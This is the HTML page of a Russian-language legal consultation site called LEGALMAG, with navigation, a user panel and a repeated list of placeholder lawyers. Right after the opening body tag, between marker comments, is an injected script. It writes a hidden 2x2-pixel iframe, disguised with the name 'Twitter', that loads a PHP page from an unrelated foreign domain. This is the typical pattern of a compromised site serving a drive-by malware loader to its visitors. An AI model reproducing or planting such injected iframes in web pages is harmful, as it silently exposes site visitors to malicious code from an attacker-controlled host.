<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>
<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="logged">
					Привет,&nbsp;<a class="enter" href="">Валентин!</a>
					<a class="register" href="">Выйти</a>
					<div class="sep"></div>
				</div>
				<nav class="auth"><!--top-navigation-->
					<ul>
						<li class="active"><a href="">Лента вопросов</a></li>
						<li><a href="">Каталог</a></li>
						<li><a href="">Личный кабинет</a></li>
						<li ><a href="">Вопросы и ответы</a></li>
						<li><a href="">Как это работает?</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<aside id="left-col">
					<div id="user">
						<img src="design/img/noAvatar.png" alt="">
						<p class="name">Валентин Кислый</p>
						<a class="editProfile" href="">редактировать профиль</a>
						<p class="myMessages"><a href="">Мои сообщения</a> (<span>3</span>)</p>
					</div>
					<div id="post">
						<div>
							<img src="design/img/leftOne.png" alt="">
							<a class="head" href="">Задать вопрос</a>
							<p>Ваш вопрос будет доступен всем юристам</p>
						</div>
						<div>
							<img src="design/img/leftTwo.png" alt="">
							<a class="head" href="">Персональный вопрос</a>
							<p>Вы сожете выбрать кто будет отвечать на Ваш вопрос</p>
						</div>
						<div>
							<img src="design/img/leftThree.png" alt="">
							<a class="head" href="">Предложить работу</a>
							<p>Вы можете опубликовать вакансию, или разовую работу для юристов</p>
						</div>
						<div id="leftSay"></div>
					</div>
					<div id="offers">
						<h2>Предлагаю услуги:</h2>
						<dl>
							<dt><img src="design/images/offers.jpg" alt=""></dt>
							<dd class="name">Иванов Иван Сергеевич</dd>
							<dd class="spec">Специалист по гражданскому и семейному праву</dd>
							<dd><input type="submit" class="button-fox" value="Написать"></dd>
							<dd class="clear none">&nbsp;</dd>
						</dl>
						<dl>
							<dt><img src="design/images/offers.jpg" alt=""></dt>
							<dd class="name">Иванов Иван Сергеевич</dd>
							<dd class="spec">Специалист по гражданскому и семейному праву</dd>
							<dd><input type="submit" class="button-fox" value="Написать"></dd>
							<dd class="clear none">&nbsp;</dd>
						</dl>
						<dl>
							<dt><img src="design/images/offers.jpg" alt=""></dt>
							<dd class="name">Иванов Иван Сергеевич</dd>
							<dd class="spec">Специалист по гражданскому и семейному праву</dd>
							<dd><input type="submit" class="button-fox" value="Написать"></dd>
							<dd class="clear none">&nbsp;</dd>
						</dl>
					</div>
				</aside>
				<section id="right-col">
					<section id="center">
						<p>Legalmag предлагает направить ваш вопрос следующим 10 юристам. Если какой-то кандидат вам не подходит, вы можете удалить его из списка, либо заменить другим кандидатом.</p>
						<div class="wrapper">
							<div class="lawyer">
								<div class="left">
									<div class="img">
										<a href=""><img src="design/images/face.jpg" alt=""></a>
									</div>
									<a href="">Иванова Снежанна Нургалиевна</a>
									<div class="rating">
										<img src="design/images/stars.png" alt="">
									</div>
									<p>Местоположение: Москва</p>
									<p>Специализация: <a href="">семейное право</a></p>
								</div>
								<div class="right">
									<a class="delete" href="">Удалить</a>
									<a class="change" href="">Заменить</a>
								</div>
								<div class="clear">&nbsp;</div>
							</div>
							<div class="lawyer">
								<div class="left">
									<div class="img">
										<a href=""><img src="design/images/face.jpg" alt=""></a>
									</div>
									<a href="">Иванова Снежанна Нургалиевна</a>
									<div class="rating">
										<img src="design/images/stars.png" alt="">
									</div>
									<p>Местоположение: Москва</p>
									<p>Специализация: <a href="">семейное право</a></p>
								</div>
								<div class="right">
									<a class="delete" href="">Удалить</a>
									<a class="change" href="">Заменить</a>
								</div>
								<div class="clear">&nbsp;</div>
							</div>
							<div class="lawyer">
								<div class="left">
									<div class="img">
										<a href=""><img src="design/images/face.jpg" alt=""></a>
									</div>
									<a href="">Иванова Снежанна Нургалиевна</a>
									<div class="rating">
										<img src="design/images/stars.png" alt="">
									</div>
									<p>Местоположение: Москва</p>
									<p>Специализация: <a href="">семейное право</a></p>
								</div>
								<div class="right">
									<a class="delete" href="">Удалить</a>
									<a class="change" href="">Заменить</a>
								</div>
								<div class="clear">&nbsp;</div>
							</div>
							<div class="lawyer">
								<div class="left">
									<div class="img">
										<a href=""><img src="design/images/face.jpg" alt=""></a>
									</div>
									<a href="">Иванова Снежанна Нургалиевна</a>
									<div class="rating">
										<img src="design/images/stars.png" alt="">
									</div>
									<p>Местоположение: Москва</p>
									<p>Специализация: <a href="">семейное право</a></p>
								</div>
								<div class="right">
									<a class="delete" href="">Удалить</a>
									<a class="change" href="">Заменить</a>
								</div>
								<div class="clear">&nbsp;</div>
							</div>
							<div class="lawyer">
								<div class="left">
									<div class="img">
										<a href=""><img src="design/images/face.jpg" alt=""></a>
									</div>
									<a href="">Иванова Снежанна Нургалиевна</a>
									<div class="rating">
										<img src="design/images/stars.png" alt="">
									</div>
									<p>Местоположение: Москва</p>
									<p>Специализация: <a href="">семейное право</a></p>
								</div>
								<div class="right">
									<a class="delete" href="">Удалить</a>
									<a class="change" href="">Заменить</a>
								</div>
								<div class="clear">&nbsp;</div>
							</div>
							<div class="lawyer">
								<div class="left">
									<div class="img">
										<a href=""><img src="design/images/face.jpg" alt=""></a>
									</div>
									<a href="">Иванова Снежанна Нургалиевна</a>
									<div class="rating">
										<img src="design/images/stars.png" alt="">
									</div>
									<p>Местоположение: Москва</p>
									<p>Специализация: <a href="">семейное право</a></p>
								</div>
								<div class="right">
									<a class="delete" href="">Удалить</a>
									<a class="change" href="">Заменить</a>
								</div>
								<div class="clear">&nbsp;</div>
							</div>
							<div class="lawyer">
								<div class="left">
									<div class="img">
										<a href=""><img src="design/images/face.jpg" alt=""></a>
									</div>
									<a href="">Иванова Снежанна Нургалиевна</a>
									<div class="rating">
										<img src="design/images/stars.png" alt="">
									</div>
									<p>Местоположение: Москва</p>
									<p>Специализация: <a href="">семейное право</a></p>
								</div>
								<div class="right">
									<a class="delete" href="">Удалить</a>
									<a class="change" href="">Заменить</a>
								</div>
								<div class="clear">&nbsp;</div>
							</div>
			         		</div>
			         		<input type="submit" class="buttonPublishTo" value="Опубликовать&nbsp;&raquo;">
			         	</section>
			         	<aside>
			         		<input type="submit" class="buttonPublishTo" value="Опубликовать&nbsp;&raquo;">
			         	</aside>
				</section>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>